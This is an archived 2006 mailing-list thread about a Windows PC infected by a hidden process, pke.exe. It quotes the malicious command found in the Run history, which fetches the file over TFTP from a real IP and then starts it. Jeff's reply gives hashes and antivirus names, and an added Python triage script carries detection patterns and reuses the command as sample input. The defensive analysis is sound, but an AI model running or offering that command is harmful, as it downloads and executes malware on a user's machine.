HP3000-L Archives

December 2006, Week 2

HP3000-L@RAVEN.UTC.EDU

Subject:
From: Jeff Kell <[log in to unmask]>
Reply To: Jeff Kell <[log in to unmask]>
Date: Thu, 14 Dec 2006 23:46:14 -0500
Content-Type: text/plain
Parts/Attachments: text/plain (47 lines)

Craig Lalley wrote:
> I generally keep a good eye on my computer.
>
> Today I noticed that network packets were leaving my PC, without my understanding why.
>
> I turned off all processes that could be communicating.  I even looked at my McAfee firewall, but nothing was identified.
>
> My task manager showed no processes that were unknown.
>
> I found this in my run commands drop down box.
> %comspec% /c tftp -i 66.36.241.146 GET pke.exe & start pke
>
> So, I downloaded process explorer from www.sysinternals.com.
>
> And lo and behold, there was a hidden process pke, consuming 49% of the CPU (think hyperthreading).  I was able to kill it, and find the offending program and remove it.
>
> Has anyone seen anything like this before?
All the time, being a security person at a university.  The question would
be, how did it get there?  Are you patched?  Did you get the timestamps
of the file before you deleted it?  Recall what you were doing at the time?

The IP belongs to HopOne, which is "a really bad neighborhood".  The
file itself:

File size: 18964 bytes
MD5: 8e6f28e1257d7dc0aa94b7b69a8721ca
SHA1: cbfa37aeb293fbbe082b86f0b4c83f3c38f53436
packers: ASPACK

Antivirus     Version      Update       Result
AntiVir       7.3.0.15     12.14.2006   HEUR/Malware
BitDefender   7.2          12.15.2006   Generic.Malware.SYdld.228593FE
DrWeb         4.33         12.14.2006   BACKDOOR.Trojan
eSafe         7.0.14.0     12.14.2006   suspicious Trojan/Worm
Fortinet      2.82.0.0     12.15.2006   suspicious
Ikarus        T3.1.0.26    12.14.2006   Trojan-Spy.Win32.Delf.OR
NOD32v2       1922         12.14.2006   probably unknown NewHeur_PE virus

Not sure what it is, but it's not nice.  Will look into this one a bit,
haven't seen it before and it's not very well known based on the few
hits above.

Jeff
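
The triage steps this thread walks through (spotting a fetch-then-run entry in the Run history, and recording size, timestamps and hashes of the dropped file before deleting it, as Jeff asks) can be scripted. The following is an added example written for this archive page, not code from either poster. It assumes the Run-history entries below are constructed samples (one is the exact line Craig found, the other two are benign), that the hash watchlist is seeded only with the MD5/SHA1 values Jeff quoted for pke.exe, and that `preserve_evidence` is pointed at a copy of the suspect file before it is removed.

```python
"""Triage helpers for the "pke.exe" incident discussed in the thread.

Added example, not code from the original HP3000-L post. Assumptions:
the command lines in SAMPLE_RUN_HISTORY are constructed samples of what a
Windows Run history (the "run commands drop down box") might hold, and the
hash watchlist holds only the MD5/SHA1 values Jeff quoted for pke.exe.
"""
import hashlib
import os
import re
from datetime import datetime, timezone

# Digests quoted in the post for the downloaded pke.exe.
WATCHLIST = {
    "md5": {"8e6f28e1257d7dc0aa94b7b69a8721ca"},
    "sha1": {"cbfa37aeb293fbbe082b86f0b4c83f3c38f53436"},
}

# A TFTP fetch: "tftp -i <host> GET <file>" (the -i binary flag is optional).
TFTP_FETCH = re.compile(
    r"\btftp(?:\.exe)?\s+(?:-i\s+)?(?P<host>\S+)\s+get\s+(?P<file>\S+)",
    re.IGNORECASE,
)
# ...chained to something that runs, via '&', '&&' or '||', optionally
# through the 'start' verb, as in the entry Craig found.
CHAINED_EXEC = re.compile(
    r"(?:&&?|\|\|)\s*(?:start\s+)?(?P<exe>\S+)", re.IGNORECASE
)


def classify_command(cmdline):
    """Describe a fetch-then-run command line, or return None if it is not one."""
    m = TFTP_FETCH.search(cmdline)
    if not m:
        return None
    info = {"host": m.group("host"), "file": m.group("file"), "executes": None}
    e = CHAINED_EXEC.search(cmdline[m.end():])
    if e:
        info["executes"] = e.group("exe")
    return info


def scan_run_history(entries):
    """Return [(entry, info)] for every entry that looks like download-and-execute."""
    hits = []
    for entry in entries:
        info = classify_command(entry)
        if info:
            hits.append((entry, info))
    return hits


def is_known_bad(digests):
    """True if any supplied digest (dict keyed by algorithm name) is on the watchlist."""
    return any(
        digests.get(algo, "").lower() in known for algo, known in WATCHLIST.items()
    )


def preserve_evidence(path):
    """Record size, timestamps and hashes of a file before it is removed.

    This is the information Jeff asks about: timestamps plus hashes, which
    can then be compared against the watchlist or submitted to a scanner."""
    st = os.stat(path)
    with open(path, "rb") as fh:
        data = fh.read()
    digests = {
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
    }
    return {
        "path": path,
        "size": st.st_size,
        "mtime": datetime.fromtimestamp(st.st_mtime, timezone.utc).isoformat(),
        "ctime": datetime.fromtimestamp(st.st_ctime, timezone.utc).isoformat(),
        "digests": digests,
        "known_bad": is_known_bad(digests),
    }


# Constructed sample Run history: the entry from Craig's message plus two
# benign entries, including a plain TFTP upload that must not be flagged.
SAMPLE_RUN_HISTORY = [
    r"notepad.exe C:\temp\notes.txt",
    "%comspec% /c tftp -i 66.36.241.146 GET pke.exe & start pke",
    "tftp 192.0.2.10 PUT report.txt",
]

if __name__ == "__main__":
    for entry, info in scan_run_history(SAMPLE_RUN_HISTORY):
        print("suspect:", entry, "->", info)
```

Run as-is, the script flags only Craig's entry and reports the host it pulled from, the file fetched, and what was started afterwards; the `PUT` entry is a legitimate upload and is ignored. `preserve_evidence` is meant to be called on the file while it still exists, so the hashes and timestamps survive the cleanup and can be matched against the digests in Jeff's reply.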

* To join/leave the list, search archives, change list settings, *
* etc., please visit http://raven.utc.edu/archives/hp3000-l.html *
